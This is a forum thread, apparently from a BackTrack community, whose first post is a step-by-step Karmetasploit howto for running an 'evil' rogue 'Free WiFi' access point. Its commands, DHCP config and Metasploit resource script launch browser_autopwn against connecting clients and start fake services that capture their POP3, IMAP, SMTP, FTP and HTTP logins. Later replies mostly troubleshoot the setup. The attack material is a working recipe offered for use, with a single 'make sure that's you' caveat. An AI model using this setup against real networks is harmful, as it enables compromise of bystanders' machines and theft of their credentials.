Page 1 of 4 123 ... LastLast
Results 1 to 10 of 32

Thread: Karmetasploit Howto

  1. #1
    Member floyd's Avatar
    Join Date
    Mar 2009
    Posts
    231

    Default Karmetasploit Howto

    I was bored by Wireless Cracking, so I wanted to try something different. I found Karmetasploit. It's nothing very challenging and I just copy and paste the information from Karmetasploit – Metasploit and skipped/included things to fit to BT 4 Pre Final! But maybe it's useful for someone...

    Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerfull Metasploit. This is how it worked for me:

    First you could update your system with apt-get update && apt-get updgrade.

    Then make sure that injection is working:
    Code:
    airmon-ng start [wifi-interface]
    eg. airmon-ng start wlan0

    Code:
    aireplay-ng --test [monitor-interface]
    eg. aireplay-ng --test mon0

    If you only have 0 percent values, you likely need to fix your card so that injection works. Then set up the dhcp service:

    Code:
    mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak
    And write a new dhcpd.conf:

    Code:
    nano /etc/dhcp3/dhcpd.conf
    Write in the following:
    Code:
    option domain-name-servers 10.0.0.1;
    
    default-lease-time 60;
    max-lease-time 72;
    
    ddns-update-style none;
    
    authoritative;
    
    log-facility local7;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option routers 10.0.0.1;
      option domain-name-servers 10.0.0.1;
    }
    The next step is to...

    .. set up a "Free" Wifi ...
    Code:
    airbase-ng -P -C 30 -e "Free WiFi" -v [monitor-interface]
    ... configure interface ...

    Code:
    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    ... configure dhcp for the at0 interface

    Code:
    dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
    You can ignore the error. Then you can place a new file, let's say to /root

    Code:
    nano /root/karma.rc
    with the following content
    Code:
    load db_sqlite3
    db_create /root/karma.db
    
    use auxiliary/server/browser_autopwn
    
    setg AUTOPWN_HOST 10.0.0.1
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads
    
    set LHOST 10.0.0.1
    set LPORT 45000
    set SRVPORT 55550
    set URIPATH /ads
    
    run
    
    
    use auxiliary/server/capture/pop3
    set SRVPORT 110
    set SSL false
    run
    
    use auxiliary/server/capture/pop3
    set SRVPORT 995
    set SSL true
    run
    
    use auxiliary/server/capture/ftp
    run
    
    use auxiliary/server/capture/imap
    set SSL false
    set SRVPORT 143
    run
    
    use auxiliary/server/capture/imap
    set SSL true
    set SRVPORT 993
    run
    
    use auxiliary/server/capture/smtp
    set SSL false
    set SRVPORT 25
    run
    
    use auxiliary/server/capture/smtp
    set SSL true
    set SRVPORT 465
    run
    
    use auxiliary/server/fakedns
    unset TARGETHOST
    set SRVPORT 5353
    run
    
    use auxiliary/server/fakedns
    unset TARGETHOST
    set SRVPORT 53
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 80
    set SSL false
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 8080
    set SSL false
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 443
    set SSL true
    run
    
    use auxiliary/server/capture/http
    set SRVPORT 8443
    set SSL true
    run
    To start to exploit you can run

    Code:
    /pentest/exploits/framework3/msfconsole -r /root/karma.rc
    As soon as somebody (make sure that's you) connects, you get some messages on the screen. When you hit enter you get the metasploit console, where you can type db_notes to see captured credentials. You could also use tcpdump at the at0 interface to capture the hole traffic.

    The interesting thing is, to use another machine, connect to the "Free Wifi" and then try to reach a https page (deactivate NoScript and add an exception for the certificate!). You can see how metasploit tries to exploit the other machine.

    I'm very interested in any feedback or how I could develop my evil AP further on...
    Auswaertsspiel

  2. #2
    Junior Member imported_pingu's Avatar
    Join Date
    Sep 2006
    Posts
    40

    Default

    Well compiled, thanks!

  3. #3

    Default

    Thanks, I haven't actually tried this out yet, but may do say later on Appreciate it!

    ~phoenix910

  4. #4
    Junior Member
    Join Date
    Nov 2008
    Posts
    69

    Default

    I ran this and it seemed to work very nicely but I do have one problem when i tried to change my dhcpd.conf to a .bak file it didnt save and now whenever I start backtrack it says dhcp3 failed im not sure what it really does but does anyone have there backup of it that they could send me or post just to be safe?

  5. #5
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by dragracekid View Post
    I ran this and it seemed to work very nicely but I do have one problem when i tried to change my dhcpd.conf to a .bak file it didnt save and now whenever I start backtrack it says dhcp3 failed im not sure what it really does but does anyone have there backup of it that they could send me or post just to be safe?
    boot the live cd and copy it from there ...

    m-1-k-3

  6. #6
    Member
    Join Date
    Jan 2010
    Posts
    332

    Default

    You can just remove dhcp from startup services.

    Code:
    # update-rc.d -f dhcp3-server remove
    SecurityTube has two new sections. Questions & News

  7. #7
    Junior Member
    Join Date
    Nov 2008
    Posts
    69

    Default

    Quote Originally Posted by m-1-k-3 View Post
    boot the live cd and copy it from there ...

    m-1-k-3
    didnt even think about that I feel dumb lol

  8. #8
    Junior Member
    Join Date
    Dec 2007
    Posts
    88

    Default

    when I try to run the following command:

    airbase-ng -P -C 30 -e "Free WiFi" -v ath0

    I get an error message saying something about the "P" option does not exist. I checked the help and noticed that the "P" & "C" options are not listed. (It did exist before, but I ran the "apt-get update && apt-get upgrade" command and that's when airbase seems to have changed.)

    airbase-ng

    Airbase-ng 1.0 rc1 - (C) 2008 Thomas d'Otreppe
    Original work: Martin Beck
    http://www.aircrack-ng.org

    usage: airbase-ng <options> <replay interface>

    Options:

    -a bssid : set Access Point MAC address
    -i iface : capture packets from this interface
    -w WEP key : use this WEP key to en-/decrypt packets
    -h MAC : source mac for MITM mode
    -f disallow : disallow specified client MACs (default: allow)
    -W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
    -q : quiet (do not print statistics)
    -v : verbose (print more messages)
    -A : Ad-Hoc Mode (allows other clients to peer)
    -Y in|out|both : external packet processing
    -c channel : sets the channel the AP is running on
    -X : hidden ESSID
    -s : force shared key authentication (default: auto)
    -S : set shared key challenge length (default: 128)
    -L : Caffe-Latte WEP attack (use if driver can't send frags)
    -N : cfrag WEP attack (recommended)
    -x nbpps : number of packets per second (default: 100)
    -y : disables responses to broadcast probes
    -0 : set all WPA,WEP,open tags. can't be used with -z & -Z
    -z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
    -Z type : same as -z, but for WPA2
    -V type : fake EAPOL 1=MD5 2=SHA1 3=auto
    -F prefix : write all sent and received frames into pcap file

    Filter options:
    --bssid MAC : BSSID to filter/use
    --bssids file : read a list of BSSIDs out of that file
    --client MAC : MAC of client to filter
    --clients file : read a list of MACs out of that file
    --essid ESSID : specify a single ESSID (default: default)
    --essids file : read a list of ESSIDs out of that file

    --help : Displays this usage screen

    No replay interface specified.

  9. #9
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default

    is this something similar to the Karma.sh script. Where you make a fake AP and DOS the Targeted AP to go offline, so that the user will be directed to a fake login page or something like that and will have the user put in a user name or the WPA ???

    hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html

  10. #10
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by Eatme View Post
    is this something similar to the Karma.sh script. Where you make a fake AP and DOS the Targeted AP to go offline, so that the user will be directed to a fake login page or something like that and will have the user put in a user name or the WPA ???

    hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html
    Pay attention, read a little bit and comprehend what you read. Instead of making useless posts
    The first post states what this thread is about.
    Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerfull Metasploit.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

Page 1 of 4 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •